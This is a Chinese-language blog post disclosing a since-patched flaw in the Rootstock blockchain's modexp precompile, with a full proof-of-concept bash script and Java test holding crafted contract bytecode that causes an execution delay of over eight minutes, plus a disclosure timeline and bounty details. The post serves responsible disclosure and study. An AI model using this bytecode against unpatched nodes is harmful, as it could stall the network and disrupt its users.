Rootstock Labs智能合约执行延迟漏洞分析:modexp预编译缺陷导致8分钟延迟

漏洞概要

Rootstock区块链的modexp预编译合约存在缺陷,可导致特制智能合约执行出现长时间延迟(最长8分钟)。

复现步骤

测试环境:Linux x64系统

#!/bin/bash

wget -q https://download.java.net/java/GA/jdk11/9/GPL/openjdk-11.0.2_linux-x64_bin.tar.gz
tar zxf openjdk-11.0.2_linux-x64_bin.tar.gz
export JAVA_HOME=$(realpath jdk-11.0.2/)
git clone --depth 1 https://github.com/rsksmart/rskj.git
cd rskj/
./configure.sh
echo """
package co.rsk.vm;

import org.ethereum.config.blockchain.upgrades.ActivationConfig;
import co.rsk.config.TestSystemProperties;
import co.rsk.config.VmConfig;
import org.ethereum.vm.*;
import org.ethereum.core.BlockFactory;
import org.ethereum.core.BlockTxSignatureCache;
import org.ethereum.core.ReceivedTxSignatureCache;
import org.ethereum.vm.program.invoke.ProgramInvokeMockImpl;
import java.util.HashSet;
import org.ethereum.vm.program.Program;
import org.ethereum.config.blockchain.upgrades.ActivationConfigsForTest;
import javax.xml.bind.DatatypeConverter;
import org.junit.jupiter.api.Test;

public class Poc {
    @Test
    void testPoc() {
        TestSystemProperties config = new TestSystemProperties();
        PrecompiledContracts precompiledContracts = new PrecompiledContracts(config, null, new BlockTxSignatureCache(new ReceivedTxSignatureCache()));
        BlockFactory blockFactory = new BlockFactory(config.getActivationConfig());
        VmConfig vmConfig = config.getVmConfig();
        ProgramInvokeMockImpl invoke = new ProgramInvokeMockImpl();
        ActivationConfig.ForBlock activations = ActivationConfigsForTest.fingerroot500().forBlock(0);

        byte[] code = DatatypeConverter.parseHexBinary(\"3332335b59313660d53d601c30303030333333333d601c30303030333333333333321b1b1b1b325b593136605858425a606052015952601d52609880808060006000600536f1603d3333321b1b1b1b32365b3159605858425a606052015952601d52609880808060006000600536f1603d313880813b60003960006000f50a30303030303030\");

        invoke.setGas(1000 * 1000 * 5);
        VM vm = new VM(vmConfig, precompiledContracts);
        Program program = new Program(vmConfig, precompiledContracts, blockFactory, activations, code, invoke,null, new HashSet<>(), new BlockTxSignatureCache(new ReceivedTxSignatureCache()));

        for (int k = 0; k < 250; k++) {
            vm.step(program);
        }
    }
}
""">rskj-core/src/test/java/co/rsk/vm/Poc.java

# 可能因java.lang.OutOfMemoryError异常失败
time ./gradlew test  --tests co.rsk.vm.Poc.testPoc

# 增加测试堆大小
sed -i 's/Xmx3G/Xmx10G/g' rskj-core/build.gradle

# 再次运行
time ./gradlew test  --tests co.rsk.vm.Poc.testPoc

输出结果

real    8m23.429s
user    0m3.147s
sys     0m0.265s

漏洞影响

可能导致整个网络停滞。

处理过程

  • 2024年3月11日:漏洞报告提交
  • 2024年3月26日:Rootstock团队确认漏洞存在并开始修复
  • 2024年4月11日:漏洞修复完成并发布补丁
  • 2024年6月13日:漏洞报告公开披露

漏洞奖励

Rootstock Labs将该漏洞评为高风险(8.3分),并向报告者支付了漏洞赏金。
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
公众号二维码

posted @ 2025-08-05 22:16  qife  阅读(13)  评论(0)    收藏  举报